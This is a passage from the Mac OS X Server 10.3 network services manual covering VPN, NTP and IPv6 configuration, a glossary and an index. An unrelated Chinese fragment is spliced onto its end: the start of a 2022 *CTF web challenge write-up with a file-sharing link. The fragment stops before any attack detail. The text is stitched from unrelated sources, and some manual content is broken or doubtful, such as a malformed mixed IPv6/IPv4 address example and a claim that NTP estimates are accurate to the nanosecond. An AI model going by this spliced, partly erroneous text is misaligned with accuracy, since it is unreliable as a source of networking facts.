physically separated. For example, each remote user or node uses the network
resources of its Internet Service Provider (ISP) rather than having a direct, wired link to
the main location. VPNs also allow verified mobile users to access private computer
resources (file servers, etc.) from any connection to the Internet. Finally, VPN can link
multiple LANs together over great distances using existing Internet infrastructure.
This chapter describes VPN authentication method, transport protocols, and how to
configure, manage, and monitor VPN service. It does not include instructions for
configuring VPN clients for use of your VPN server.
LL2351.Book Page 71 Monday, September 8, 2003 2:47 PM
72
Chapter 5 VPN Service
VPN and Security
VPNs stress security by strong authentication of identity, and encrypted data transport
between the nodes, for data privacy and inalterability. The following section contains
information about each supported transport and authentication method.
Authentication Method
Mac OS X Server VPN uses Microsoft’s Challenge Handshake Authentication Protocol
version 2 (MS-CHAPv2) for authentication. It is also the standard Windows
authentication scheme for VPN. This authentication method encodes passwords when
they’re sent over the network, and stores them in a scrambled form on the server
offering good security during network transmission.
This authentication method is the default and available for both transport protocols
described in the following section.
Mac OS X Server supports several authentication methods. Each has its own strengths
and requirements. It is not possible to choose your authentication method using Server
Admin. If you need to configure a different authentication scheme from the default (for
example, to use RSA Security’s SecurID authentication), you’ll need to edit the VPN
configuration file manually. The configuration file is located at:
/Library/Preferences/SystemConfiguration/com.apple.RemoteAccessServers.plist
Transport Protocols
You’ll be able to enable either or both of the encrypted transport protocols. Each has
its own strengths and requirements.
Point to Point Tunneling Protocol (PPTP)
PPTP is the Windows standard VPN protocol. PPTP offers good encryption and supports
a number of authentication schemes. It uses the user-provided password to produce an
encryption key. You can also allow 40-bit (weak) security encryption in addition to the
default 128-bit (strong) encryption if needed by your VPN clients.
PPTP is necessary if you have Windows or Mac OS X 10.2.x clients.
Layer Two Tunnelling Protocol, Secure Internet Protocol (L2TP/IPSec)
L2TP/IPSec uses strong IPSec encryption to “tunnel” data to and from the network
nodes. It is essentially a combination of Cisco’s L2F and PPTP. IPSec requires Security
Certificates from a Certificate Authority like Verisign, or a pre-defined shared secret
between connecting nodes. The shared secret must be entered on the server as well as
a client. It is not a password for authentication, but it is used to generate encryption
keys to establish secure tunnels between nodes.
LL2351.Book Page 72 Monday, September 8, 2003 2:47 PM
Chapter 5 VPN Service
73
Before You Set Up VPN Service
Before setting up Virtual Private Network (VPN) service, you need to determine which
transport protocol you’re going to use. The table below shows which protocols are
supported by different platforms.
If you’re using L2TP, you need to have a Security Certificate from a Certificate Authority
like Verisign, or a pre-defined shared secret between connecting nodes. If you choose a
shared secret, it needs to be secure as well (8-12+ alphanumeric characters with
punctuation) and kept secret by the users.
If you’re using PPTP, you need to make sure all of your clients support 128-bit PPTP
connections, for greatest transport security. Be aware that enabling 40-bit transport
security is a serious security risk.
Managing VPN Service
This section describes tasks associated with managing VPN service. It includes starting,
stopping, and configuring the service.
Starting or Stopping VPN Service
You use Server Admin to start and stop VPN service.
To start or stop VPN service:
1 In Server Admin, choose the VPN Service from the Computers & Services list.
2 Make sure at least one of the transport protocols is checked and configured.
3 Click Start Service or Stop Service.
When the service is turned on, the Stop Service button is available.
Enabling and Configuring L2TP Transport Protocol
Use Server Admin to designate L2TP as the transport protocol. By enabling this
protocol, you must also configure the connection settings. You must designate an IPSec
shared secret (if you don’t use a Certificate Authority’s Security Certificate), the IP
address allocation range to be given to your clients, and group to be allowed VPN
priviledges (if desired). If both L2TP and PPTP are used, each protocol should have a
separate, non-overlapping address range.
If you have...
you can use L2TP/IPSec.
you can use PPTP.
Mac OS X 10.3.x clients
X
X
Mac OS X 10.2.x clients
X
Windows clients
X (if Windows XP)
X
Linux or Unix clients
X
X
LL2351.Book Page 73 Monday, September 8, 2003 2:47 PM
74
Chapter 5 VPN Service
To enable L2TP:
1 In Server Admin, choose the VPN Service from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select L2TP.
5 Enter the shared secret.
6 Set the beginning IP address of the allocation range.
7 Set the ending IP address of the allocation range.
8 Enter the group that has access to VPN login.
You can use the Users & Groups button to browse for a group.
If you leave this blank, all workgroups will have access to VPN login.
9 Click Save.
Enabling and Configuring PPTP Transport Protocol
Use Server Admin to designate PPTP as the transport protocol. By enabling this
protocol, you must also configure the connection settings. You should designate an
encryption key length (40-bit in addition to 128-bit), the IP address allocation range to
be given to your clients, and group to be allowed VPN priviledges (if desired). If both
L2TP and PPTP are used, each protocol should have a separate, non-overlapping
address range.
To enable PPTP:
1 In Server Admin, choose the VPN Service from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select PPTP.
5 If desired, select “Allow 40-bit encryption keys” to allow such keys to be used in
addition to 128-bit keys.
6 Set the beginning and IP addresses of the allocation range.
7 Enter the group that has access to VPN login.
You can use the Users & Groups button to browse for a group.
If you leave this blank, all workgroups will have access to VPN login.
8 Click Save.
Warning: Allowing 40-bit encryption keys is less secure, but may be necessary for
some VPN client applications.
LL2351.Book Page 74 Monday, September 8, 2003 2:47 PM
Chapter 5 VPN Service
75
Configuring Additional Network Settings for VPN Clients
When a user connects in to your server through VPN, that user is given an IP address
from your allocated range. If this range is not served by a DHCP server, you’ll need to
configure additional network settings. These setting include the network mask, DNS
address, and search domains.
To configure addition network settings:
1 In Server Admin, choose the VPN Service from the Computers & Services list.
2 Click Settings.
3 Select the Client Information tab.
4 Enter the network mask for your allocated IP address range.
5 Enter the IP address of the DNS server.
6 Enter any search domains, as needed.
7 Click Save.
Configuring VPN Network Routing Definitions
Network routing definitions allow you to route data to from some specific address
either through the VPN tunnel or the insecure network. For example, you may want all
traffic that goes to the LAN IP address range to go through the secure tunnel to the
LAN, but make all traffic to other addresses to be routed through the user’s normal,
unsecured Internet connection.This helps you have a finer control over what goes
through the VPN tunnel.
The following definitions are unordered; they apply only the description that most
closely matches the packet being routed.
To set routing definitions:
1 In Server Admin, choose VPN Service from the Computers & Services list.
2 Click Settings.
3 Select the Client Information tab.
4 Click the Add button below the routing definition list.
5 Enter the address range of the packets to be routed.
6 Enter the network mask of the address range to be routed.
7 Select the routing destination from the pop-up menu.
Private means to route it through the VPN tunnel.
Public means to use the normal interface with no tunnel.
LL2351.Book Page 75 Monday, September 8, 2003 2:47 PM
76
Chapter 5 VPN Service
Monitoring VPN Service
This section describes tasks associated with monitoring a functioning VPN service. It
includes accessing status reports, setting logging options, viewing logs, and
monitoring connections.
Viewing a VPN Status Overview
The VPN Overview gives you a quick status report on your enabled VPN services. It tells
you how many L2TP and PPTP clients you have connected, which authentication
method is selected, and when the service was started.
To view the overview:
1 In Server Admin, choose VPN Service from the Computers & Services list.
2 Click the Overview button.
Setting the Log Detail Level for VPN Service
You can choose the level of detail you want to log for VPN service.
• Non-verbose will indicate conditions for which you need to take immediate action
(for example, if the VPN service can’t start up).
• Verbose will record all activity by the VPN service, including routine functions.
Non-verbose login is enabled by default.
To set VPN log detail:
1 In Server Admin, choose VPN Service from the Computers & Services list.
2 Click Settings.
3 Select the Logging tab.
4 Select Verbose to enable verbose logging, if desired.
5 Click Save.
Setting the VPN Log Archive Interval
Mac OS X Server can automatically archive VPN service logs after a certain amount of
time. Each archive log is compressed and uses less disk space than the original log file.
You can customize the schedule to archive the logs after a set period of time, measured
in days.
To set up the log archive interval:
1 In Server Admin, choose VPN Service from the Computers & Services list.
2 Click Settings.
3 Select the Logging tab.
4 Select “Archive Log every ___ days”
5 Enter the log archive rollover interval you want.
6 Click Save.
LL2351.Book Page 76 Monday, September 8, 2003 2:47 PM
Chapter 5 VPN Service
77
Viewing the VPN Log
You’ll need to monitor VPN logs to ensure smooth operation of your Virtual Private
Network. The VPN logs can help you troubleshoot problems.
To view the log:
1 In Server Admin, choose VPN Service from the Computers & Services list.
2 Click Logs.
Viewing VPN Client Connections
You can monitor VPN client connections to ensure secure access to the Virtual Private
Network. The client connection screen allows you to see the user connected, the IP
address that user is connection from, the IP address assigned by your network, and the
type and duration of connection.
You can sort the list by clicking on the column headers.
To view client connections:
1 In Server Admin, choose VPN Service from the Computers & Services list.
2 Click Connections.
Where to Find More Information
For more information about L2TP/IPSec:
The Internet Engineering Task Force (IETF) is working on formal standards for L2TP/
IPsec user authentication. See the website www.ietf.org/ids.by.wg/ipsec.html for more
information.
Request For Comment Documents
Request for Comments (RFC) documents provide an overview of a protocol or service
and details about how the protocol should behave. If you’re a novice server
administrator, you’ll probably find some of the background information in an RFC
helpful. If you’re an experienced server administrator, you can find all the technical
details about a protocol in its RFC document. You can search for RFC documents by
number at the website www.faqs.org/rfcs.
• For L2TP description, see RFC 2661.
• For PPTP description, see RFC 2637.
LL2351.Book Page 77 Monday, September 8, 2003 2:47 PM
LL2351.Book Page 78 Monday, September 8, 2003 2:47 PM
6
79
6 NTP Service
Network Time Protocol (NTP) is a network protocol used to synchronize the clocks of
computers on your network to a time reference clock. NTP is used to ensure that all the
computers on a network are reporting the same time.
If an isolated network, or even a single computer, is running on wrong time, services
that use time and date stamps (like mail service, or web service with timed cookies) will
send wrong time and date stamps and be out of synchronization with other computers
across the Internet. For example, an email message could arrive minutes or years before
it was sent (according to the time stamp), and a reply to that message could come
before the original was sent.
How NTP Works
NTP uses Universal Time Coordinated (UTC) as its reference time. UTC is based on an
atomic resonance, and clocks that run according to UTC are often called “atomic
clocks.”
Internet-wide, authoritative NTP servers (called Stratum 1 servers) keep track of the
current UTC time. Other subordinate servers (called Stratum 2 and 3 servers) query the
Stratum 1 servers on a regular basis and estimate the time taken across the network to
send and receive the query. They then factor this estimate with the query result to set
the Stratum 2 or 3 servers own time. The estimates are accurate to the nanosecond.
Your local network can then query the Stratum 3 servers for the time. Then it repeats
the process. An NTP client computer on your network then takes the UTC time
reference and converts it, through its own time zone setting to local time, and sets its
internal clock accordingly.
LL2351.Book Page 79 Monday, September 8, 2003 2:47 PM
80
Chapter 6 NTP Service
Using NTP on Your Network
Mac OS X Server can act not only as an NTP client, receiving authoritative time from
an Internet time server, but also as an authoritative time server for a network. Your local
clients can query your server to set their clocks. It’s advised that if you set your server to
answer time queries, you should also set it to query an authoritative server on the
Internet.
Setting Up NTP Service
If you choose to run NTP service on your network, make sure your designated server
can access a higher-authority time server. Apple provides a Stratum 2 time server for
customer use at time.apple.com.
Additionally, you’ll need to make sure your firewall allows NTP queries out to an
authoritative time server on UDP port 123, and incoming queries from local clients on
the same port. See Chapter 3, “IP Firewall Service,” on page 43 for more information on
configuring your firewall.
To set up NTP service:
1 Make sure your server is configured to “Set Date & Time automatically.”
This setting is in the Date & Time pane of System Preferences, or the Server Admin
Settings pane for the server.
2 Open Server Admin, and select the server you want to act as a time server.
3 Click Settings.
4 Select the Advanced tab.
5 Select Enable NTP.
6 Click Save.
LL2351.Book Page 80 Monday, September 8, 2003 2:47 PM
Chapter 6 NTP Service
81
Configuring NTP on Clients
If you have set up a local time server, you can configure your clients to query your time
server for getting the network date and time. By default, clients can query Apple’s time
server. These instructions allow you to set your clients to query your time server.
To configure NTP on clients:
1 Open System Preferences.
2 Click Date & Time.
3 Select the Network Time tab.
4 Select “Set Date & Time automatically.”
5 Select and delete the text in the field rather than use the pop-up menu.
6 Enter the host name of your time server.
Your host name can be either a domain name (like time.example.com) or an IP address.
7 Quit System Preferences.
Where to Find More Information
The NTP working group, documentation, and an F.A.Q. for NTP can be found at the
website www.ntp.org.
Request For Comment Documents
Request for Comments (RFC) documents provide an overview of a protocol or service
and details about how the protocol should behave. If you’re a novice server
administrator, you’ll probably find some of the background information in an RFC
helpful. If you’re an experienced server administrator, you can find all the technical
details about a protocol in its RFC document. You can search for RFC documents by
number at the website www.faqs.org/rfcs.
The official specification of NTP version 3 is RFC 1305.
LL2351.Book Page 81 Monday, September 8, 2003 2:47 PM
LL2351.Book Page 82 Monday, September 8, 2003 2:47 PM
7
83
7 IPv6 Support
IPv6 is short for “Internet Protocol Version 6."IPv6 is the Internet’s next-generation
protocol designed to replace the current Internet Protocol, IP Version 4 (IPv4, or just IP).
The current Internet Protocol is beginning to have problems coping with the growth
and popularity of the Internet. IPv4’s main problems are:
• Limited IP addressing.
IPv4 addresses are 32 bits, meaning there can be only 4,300,000,000 network
addresses.
• Increased routing and configuration burden.
The amount of network overhead, memory, and time to route IPv4 information is
rapidly increasing with each new computer connected to the Internet.
• End-to-end communication is routinely circumvented.
This point is actually an outgrowth from the IPv4 addressing problem. As the number
of computers increases and the address shortages become more acute, another
addressing and routing service has been developed, Network Address Translation
(NAT), which mediates and separates the two network end points. This frustrates a
number of network services and is limiting.
IPv6 fixes some of these problems and helps others. It adds improvements in areas
such as routing and network auto-configuration. It has increased the number of
network addresses to over 3 x1038, and eliminates the need for NAT. IPv6 is expected to
gradually replace IPv4 over a number of years, with the two coexisting during the
transition.
This chapter lists the IPv6 enabled services used by Mac OS X Server, gives guidelines
for using the IPv6 addresses in those services, and explains IPv6 address types and
notation.
LL2351.Book Page 83 Monday, September 8, 2003 2:47 PM
84
Chapter 7 IPv6 Support
IPv6 Enabled Services
The following services in Mac OS X Server support IPv6 in addressing:
• DNS (BIND)
• IP Firewall
• Mail (POP/IMAP/SMTP)
• SMB
• Web (Apache 2)
Additionally, there are a number of command-line tools installed with Mac OS X Server
that support IPv6 (for example, ping6, and traceroute6).
IPv6 Addresses in the Server Admin
The services above don’t support IPv6 addresses in the user interface. They can be
configured with command-line tools to add IPv6 addresses, but those same addresses
will fail if entered into address fields in Server Admin.
IPv6 Addresses
IPv6 addresses are different than IPv4 addresses. In changing addresses, there are
changes in address notation, reserved addresses, the address model, and address types.
Notation
While IPv4 addresses are 4 bytes long and expressed in decimals, IPv6 addresses are 16
bytes long and can be expressed a number of ways.
IPv6 addresses are generally written in the following form:
xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx
Pairs of IPv6 bytes are separated by a colon and each byte is represented as a pair of
hexadecimal number, as in the following example:
E3C5:0000:0000:0000:0000:4AC8:C0A8:6420
or
E3C5:0:0:0:0:4AC8:C0A8:6420
IPv6 addresses often contain many bytes with a zero value, so a shorthand notation is
available. The shorthand notation removes the zero values from the text representation
and puts the colons next to each other, as follows:
E3C5::4AC8:C0A8:6420
LL2351.Book Page 84 Monday, September 8, 2003 2:47 PM
Chapter 7 IPv6 Support
85
The final notation type includes IPv4 addresses. Because many IPv6 addresses are
extensions of IPv4 addresses, the right-most four bytes of an IPv6 address (the right-
most two byte pairs) can be rewritten in the IPv4 notation. This mixed notation (from
the above example) could be expressed as:
E3C5:4AC8:192.168.100.32
IPv6 Reserved Addresses
IPv6 reserves two addresses that network nodes can’t use for their own communication
purposes:
0:0:0:0:0:0:0:0 (unspecified address, internal to the protocol)
0:0:0:0:0:0:0:1 (loopback address, just like127.0.0.1 in IPv4)
IPv6 Addressing Model
IPv6 addresses are assigned to interfaces (for example, your Ethernet card), and not
nodes (for example, your computer). A single interface can be assigned multiple IPv6
addresses. Also, a single IPv6 address can be assigned to several interfaces for load
sharing. Finally, routers don’t need an IPv6 address, eliminating the need to configure
the routers for point to point unicasts. Additionally, IPv6 doesn’t use IPv4 address
classes.
IPv6 Address Types
IPv6 supports the following three IP address types:
• Unicast (one to one communication)
• Multicast (one to many communication)
• Anycast
Note that IPv6 does not support broadcast. Multicast is preferred for network
broadcasts. Otherwise, unicast and multicast in IPv6 are the same as in IPv4. Multicast
addresses in IPv6 start with “FF” (255).
Anycast is a variation of multicast. While multicast delivers messages to all nodes in the
multicast group, anycast delivers messages to any one node in the multicast group.
LL2351.Book Page 85 Monday, September 8, 2003 2:47 PM
86
Chapter 7 IPv6 Support
Where to Find More Information
The working group for the Internet Protocol Version 6 website is www.ipv6.org.
A group of IPv6 enthusiasts maintains a list of applications that support IPv6 at the
website www.ipv6forum.com/navbar/links/v6apps.htm.
Request For Comment Documents
Request for Comments (RFC) documents provide an overview of a protocol or service
and details about how the protocol should behave. If you’re a novice server
administrator, you’ll probably find some of the background information in an RFC
helpful. If you’re an experienced server administrator, you can find all the technical
details about a protocol in its RFC document. You can search for RFC documents by
number at the website www.faqs.org/rfcs.
There are over 29 IPv6 related RFC documents. A list can be found at
http://www.ipv6.org/specs.html
LL2351.Book Page 86 Monday, September 8, 2003 2:47 PM
87
Glossary
Glossary
This glossary defines terms and spells out abbreviations you may encounter while
working with online help or the Mac OS X Server Network Services Administration for
Version 10.3 or Later manual. References to terms defined elsewhere in the glossary
appear in italics.
bit A single piece of information, with a value of either 0 or 1.
broadcast The process of transmitting one copy of a stream over the whole network.
byte Eight bits.
DHCP (Dynamic Host Configuration Protocol) A protocol used to distribute IP
addresses to client computers. Each time a client computer starts up, the protocol looks
for a DHCP server and then requests an IP address from the DHCP server it finds. The
DHCP server checks for an available IP address and sends it to the client computer
along with a lease period—the length of time the client computer may use the address.
directory services Services that provide system software and applications with
uniform access to directory domains and other sources of information about users and
resources.
DNS (Domain Name System) A distributed database that maps IP addresses to
domain names. A DNS server, also known as a name server, keeps a list of names and
the IP addresses associated with each name.
DoS (denial of service) attack An Internet attack that uses thousands of network pings
to prevent the legitimate use of a server.
dynamic IP address An IP address that is assigned for a limited period of time or until
the client computer no longer needs the IP address.
filter A “screening” method used to control access to your server. A filter is made up of
an IP address and a subnet mask, and sometimes a port number and access type. The
IP address and the subnet mask together determine the range of IP addresses to which
the filter applies.
LL2351.Book Page 87 Monday, September 8, 2003 2:47 PM
88
Glossary
firewall Software that protects the network applications running on your server. IP
firewall service, which is part of Mac OS X Server software, scans incoming IP packets
and rejects or accepts these packets based on a set of filters you create.
FTP (File Transfer Protocol) A protocol that allows computers to transfer files over a
network. FTP clients using any operating system that supports FTP can connect to a file
server and download files, depending on their access privileges. Most Internet browsers
and a number of freeware applications can be used to access an FTP server.
HTTP (Hypertext Transfer Protocol) The client/server protocol for the World Wide Web.
The HTTP protocol provides a way for a web browser to access a web server and
request hypermedia documents created using HTML.
IANA (Internet Assigned Numbers Authority) An organization responsible for
allocating IP addresses, assigning protocol parameters, and managing domain names.
ICMP (Internet Control Message Protocol) A message control and error-reporting
protocol used between host servers and gateways. For example, some Internet
software applications use ICMP to send a packet on a round-trip between two hosts to
determine round-trip times and discover problems on the network.
IGMP (Internet Group Management Protocol) An Internet protocol used by hosts and
routers to send packets to lists of hosts that want to participate, in a process known as
multicasting. QuickTime Streaming Server (QTSS) uses multicast addressing, as does
Service Location Protocol (SLP).
IP (Internet Protocol) Also known as IPv4. A method used with Transmission Control
Protocol (TCP) to send data between computers over a local network or the Internet. IP
delivers packets of data, while TCP keeps track of data packets.
IP address A unique numeric address that identifies a computer on the Internet.
IP subnet A portion of an IP network, which may be a physically independent network
segment, that shares a network address with other portions of the network and is
identified by a subnet number.
IPSec A security addition to IP. A protocol that provides data transmission security for
L2TP VPN connections. IPSec acts at the network layer, protecting and authenticating IP
packets between participating IPSec nodes.
IPv6 (Internet Protocol Version 6) The next generation communication protocol to
replace IP (also known as IPv4). IPv6 allows a greater number of network addresses and
can reduce routing loads across the Internet.
LL2351.Book Page 88 Monday, September 8, 2003 2:47 PM
Glossary
89
ISP (Internet service provider) A business that sells Internet access and often provides
web hosting for ecommerce applications as well as mail services.
L2TP (Layer Two Tunnelling Protocol) A network transport protocol used for VPN
connections. It is essentially a combination of Cisco’s L2F and PPTP. L2TP itself is not an
encryption protocol, so it uses IPSec for packet encryption.
LAN (local area network) A network maintained within a facility, as opposed to a WAN
(wide area network) that links geographically separated facilities.
LDAP (Lightweight Directory Access Protocol) A standard client-server protocol for
accessing a directory domain.
lease period A limited period of time during which IP addresses are assigned. By using
short leases, DHCP can reassign IP addresses on networks that have more computers
than available IP addresses.
load balancing The process of distributing the demands by client computers for
network services across multiple servers in order to optimize performance by fully
utilizing the capacity of all available servers.
local domain A directory domain that can be accessed only by the computer on which
it resides.
Mac OS X The latest version of the Apple operating system. Mac OS X combines the
reliability of UNIX with the ease of use of Macintosh.
Mac OS X Server An industrial-strength server platform that supports Mac, Windows,
UNIX, and Linux clients out of the box and provides a suite of scalable workgroup and
network services plus advanced remote management tools.
mail host The computer that provides your mail service.
Manual Unicast A method for transmitting a live stream to a single QuickTime Player
client or to a computer running QTSS. An SDP file is usually created by the broadcaster
application and then must be manually sent to the viewer or streaming server.
master zone The DNS zone records held by a primary DNS server. A master zone is
replicated by zone transfers to slave zones on secondary DNS servers.
MS-CHAPv2 (Microsoft’s Challenge Handshake Authentication Protocol version 2)
The standard Windows authentication scheme for VPN. This authentication method
encodes passwords when they are sent over the network and stores them in a
scrambled form on the server. It offers good security during network transmission.
LL2351.Book Page 89 Monday, September 8, 2003 2:47 PM
90
Glossary
multicast An efficient, one-to-many form of streaming. Users can join or leave a
multicast but cannot otherwise interact with it.
multihoming The ability to support multiple network connections. When more than
one connection is available, Mac OS X selects the best connection according to the
order specified in Network preferences.
MX record (mail exchange record) An entry in a DNS table that specifies which
computer manages mail for an Internet domain. When a mail server has mail to deliver
to an Internet domain, the mail server requests the MX record for the domain. The
server sends the mail to the computer specified in the MX record.
name server See DNS (Domain Name System).
NAT (Network Address Translation) A method of connecting multiple computers
to the Internet (or any other IP network) using one IP address. NAT converts the IP
addresses you assign to computers on your private, internal network into one
legitimate IP address for Internet communications.
network interface Your computer’s hardware connection to some network. This
includes (but is not limited to) Ethernet connections, Airport cards, and FireWire
connections.
node A processing location. A node can be a computer or some other device, such as
a printer. Each node has a unique network address.
NTP (network time protocol) A network protocol used to synchronize the clocks of
computers across a network to some time reference clock. NTP is used to ensure that
all the computers on a network are reporting the same time.
Open Directory The Apple directory services architecture, which can access
authoritative information about users and network resources from directory domains
that use LDAP, NetInfo, or Active Directory protocols; BSD configuration files; and
network services.
open relay A server that receives and automatically forwards mail to another server.
Junk mail senders exploit open relay servers to avoid having their own mail servers
blacklisted as sources of spam.
packet A unit of data information consisting of header, information, error detection,
and trailer records. QTSS uses TCP, UDP, and IP packets to communicate with streaming
clients.
LL2351.Book Page 90 Monday, September 8, 2003 2:47 PM
Glossary
91
port A sort of virtual mail slot. A server uses port numbers to determine which
application should receive data packets. Firewalls use port numbers to determine
whether or not data packets are allowed to traverse a local network. “Port” usually
refers to either a TCP or UDP port.
protocol A set of rules that determines how data is sent back and forth between two
applications.
PTR (pointer) record A DNS record type that translates IP (IPv4) addresses to domain
names. Used in DNS reverse lookups.
QTSS (QuickTime Streaming Server) A technology that lets you deliver media over the
Internet in real time.
record type A specific category of records, such as users, computers, and mounts. For
each record type, a directory domain may contain any number of records.
recursion The process of fully resolving domain names into IP addresses. A
nonrecursive DNS query allows referrals to other DNS servers to resolve the address. In
general, user applications depend on the DNS server to perform this function, but
other DNS servers do not have to perform a recursive query.
Rendezvous A protocol developed by Apple for automatic discovery of computers,
devices, and services on IP networks. This proposed Internet standard protocol is
sometimes referred to as “ZeroConf” or “multicast DNS.” For more information, visit
www.apple.com or www.zeroconf.org.
scope A group of services. A scope can be a logical grouping of computers, such as all
computers used by the production department, or a physical grouping, such as all
computers located on the first floor. You can define a scope as part or all of your
network.
search path See search policy.
search policy A list of directory domains searched by a Mac OS X computer when it
needs configuration information; also the order in which domains are searched.
Sometimes called a search path.
shared secret A value defined at each node of an L2TP VPN connection that serves as
the encryption key seed to negotiate authentication and data transport connections.
slave zone The DNS zone records held by a secondary DNS server. A slave zone
receives its data by zone transfers from the master zone on the primary DNS server.
LL2351.Book Page 91 Monday, September 8, 2003 2:47 PM
92
Glossary
SLP (Service Location Protocol) DA (Directory Agent) A protocol that registers
services available on a network and gives users easy access to them. When a service is
added to the network, the service uses SLP to register itself on the network. SLP/DA
uses a centralized repository for registered network services.
SMTP (Simple Mail Transfer Protocol) A protocol used to send and transfer mail. Its
ability to queue incoming messages is limited, so SMTP usually is used only to send
mail, and POP or IMAP is used to receive mail.
spam Unsolicited email; junk mail.
SSL (Secure Sockets Layer) An Internet protocol that allows you to send encrypted,
authenticated information across the Internet.
static IP address An IP address that is assigned to a computer or device once and is
never changed.
Stratum 1 An Internet wide, authoritative Network Time Protocol (NTP) server that
keeps track of the current UTC time. Other stratums are available (2, 3, and so forth);
each takes its time from a lower-numbered stratum server.
subnet A grouping on the same network of client computers that are organized by
location (different floors of a building, for example) or by usage (all eighth-grade
students, for example). The use of subnets simplifies administration.
TCP (Transmission Control Protocol) A method used along with the Internet Protocol
(IP) to send data in the form of message units between computers over the Internet. IP
takes care of handling the actual delivery of the data, and TCP takes care of keeping
track of the individual units of data (called packets) into which a message is divided for
efficient routing through the Internet.
TTL (time-to-live) The specified length of time that DNS information is stored in a
cache. When a domain name–IP address pair has been cached longer than the TTL
value, the entry is deleted from the name server’s cache (but not from the primary DNS
server).
TXT (text) record A DNS record type that stores a text string for a response to a DNS
query.
UCE (unsolicited commercial email) See spam.
LL2351.Book Page 92 Monday, September 8, 2003 2:47 PM
Glossary
93
UDP (User Datagram Protocol) A communications method that uses the Internet
Protocol (IP) to send a data unit (called a datagram) from one computer to another in a
network. Network applications that have very small data units to exchange may use
UDP rather than TCP.
unicast The one-to-one form of streaming. If RTSP is provided, the user can move
freely from point to point in an on-demand movie.
UTC (universal time coordinated) A standard reference time. UTC is based on an
atomic resonance, and clocks that run according to UTC are often called “atomic
clocks.”
VPN (Virtual Private Network) A network that uses encryption and other technologies
to provide secure communications over a public network, typically the Internet. VPNs
are generally cheaper than real private networks using private lines but rely on having
the same encryption system at both ends. The encryption may be performed by
firewall software or by routers.
WAN (wide area network) A network maintained across geographically separated
facilities, as opposed to a LAN (local area network) within a facility. Your WAN interface
is usually the one connected to the Internet.
wildcard A range of possible values for any segment of an IP address.
WINS (Windows Internet Naming Service) A name resolution service used by
Windows computers to match client names with IP addresses. A WINS server can be
located on the local network or externally on the Internet.
zone transfer The method by which zone data is replicated among authoritative DNS
servers. Slave DNS servers request zone transfers from their master servers to acquire
their data.
LL2351.Book Page 93 Monday, September 8, 2003 2:47 PM
LL2351.Book Page 94 Monday, September 8, 2003 2:47 PM
95
Index
Index
A
AirPort Base Stations
DHCP service and 9
B
BIND 17, 18, 19, 37–40
about 37
configuration File 38
configuring 37–40
defined 37
example 38–40
load distribution 36
zone data files 38
C
CIDR netmask notation 45, 47
D
DHCP servers 8, 40
interactions 9
network location 8
DHCP service 7–16
AirPort Base Stations 9
changing subnets 11
deleting subnets 12
described 7
disabling subnets 14
DNS options 12
DNS Server for DHCP Clients 12
LDAP auto-configuration 9
LDAP options for subnets 13
logs 15
logs for 10
managing 10–14
more information 16
preparing for setup 7–9
setting up 9–10
starting and stopping 10
subnet IP addresses lease times, changing 12
subnet IP address lease times, changing 12
subnets 8
subnets, creating 10
subnet settings 11
uses for 7
viewing client lists 15
viewing leases, client list 15
WINS options for subnets 14
DNS service 17–41
configuring BIND 37–40
described 17
dynamic IP addresses 40–41
load distribution 36
managing 21–30
more information 41
options for DHCP subnets 12
planning 18
preparing for setup 18
servers 18
setting up 18
setup overview 18–20
starting 21
stopping 21
strategies 18–20
usage statistics 29
uses for 17
with mail service 33
domain names
registering 18, 19
DoS (Denial of Service) attacks
preventing 59
dynamic DNS 40–41
Dynamic Host Configuration Protocol
See DHCP
dynamic IP addresses 8
F
filters
editing 54
examples 57–58
filters, IP
adding 48
described 45
H
help 6
LL2351.Book Page 95 Monday, September 8, 2003 2:47 PM
96
Index
I
IANA registration 18
In 6
Internet Gateway Multicast Protocol See IGMP
Internet Protocol Version 6 See IPv6
IP addresses
assigning 9
DHCP and 7
DHCP lease times, changing 12
dynamic 8
dynamic allocation 8
IPv6 notation 84
leasing with DHCP 7
multiple 47
precedence in filters 47
ranges 47
reserved 9
static 8
IP Filter module 61–63
IP filter rules 61
IP Firewall
starting and stopping 14
IP Firewall service 43–44
about 43
adding filters 48
Any Port filter 54
background 45
benefits 44
configuring 49–58
creating filters 51
default filter 54
described 43
editing filters 54
example filters 57–58
filters 45–47
IP filter rules 61–63
logs, setting up 55–56
managing 49–59
more information 66
multiple IP addresses 47
NAT packet divert 68
planning 48
port reference 63–65
preparing for setup 45–47
preventing Denial of Service (DoS) attacks 59
setting up 48–49
starting, stopping 49
uses for 44
viewing logs 55
ipfw command 61–63
IPv6
addressing 84–85
address notation 84
available services 84
in Server Admin 84
more information 86
L
load distribution 36
logging items
DHCP activity 10
logs
DHCP 15
DNS service 28
IP Firewall service 55–56
M
Mac OS X Server
ports used by 63–65
setting up 6
Mac OS X Server Getting Started 6
Mac OS X systems 63–65
mail
redirecting 33
Mail Exchange. See MX
mail exchangers 33
mail servers 33
mail service
using DNS service with 33
MX (Mail Exchange) records 20, 33
MX hosts 33
N
named.conf file 38
name servers 18
NAT
about 67
activity monitor 68
configuring 68
monitoring 68
more information 69
packet divert 68
starting, stopping 67
status overview 68
troubleshooting 68
NetBoot
viewing client lists 15
networks
private 36–37
TCP/IP networks 36–37
NTP
about 79
configuring clients 81
more information 81
setting up 80
time system 79
O
online help 6
LL2351.Book Page 96 Monday, September 8, 2003 2:47 PM
97
Index
P
ports
Mac OS X computers 63–65
TCP ports 63–64
UDP ports 65
R
round robin 36
rules, IP filter 61–63
S
Server 10, 15, 57, 58, 69
servers
DHCP servers 40
name servers 18
static IP addresses 8
Stratum time servers 79
subnet masks 45
subnets 8
creating 8, 10
T
TCP/IP
private networks 36–37
TCP ports 63–65
Terminal application 62
time servers
Stratum 79
U
UDP ports 65
Universal Time Coordinated (UTC) 79
User Datagram Protocol See UDP
V
VPN
client connections 77
logging 76
routing definitions 75
viewing logs 77
viewing status 76
LL2351.Book Page 97 Monday, September 8, 2003 2:47 PM | pdf |
2022*CTF-Web
写在前⾯
XCTF国际赛系列⼀直不错,周末参与了下这次⽐赛,虽然没有Java但总体还是蛮有意思
这⾥没按题⽬顺序写,只是写了在我⼼中从上到下的排序,对有源码的题⽬做了备份
oh-my-lotto
链接: https://pan.baidu.com/s/1G53aYqIIbHGlowdWFhkKqw 提取码: oism
oh-my-lotto
⼼⽬中⽐较有趣的⼀题呗,重⽣之我是赌神
这是⼀个⾮预期,因为后⾯又上了个revenge,简单分析下题⽬,先看看docker内容,可以知
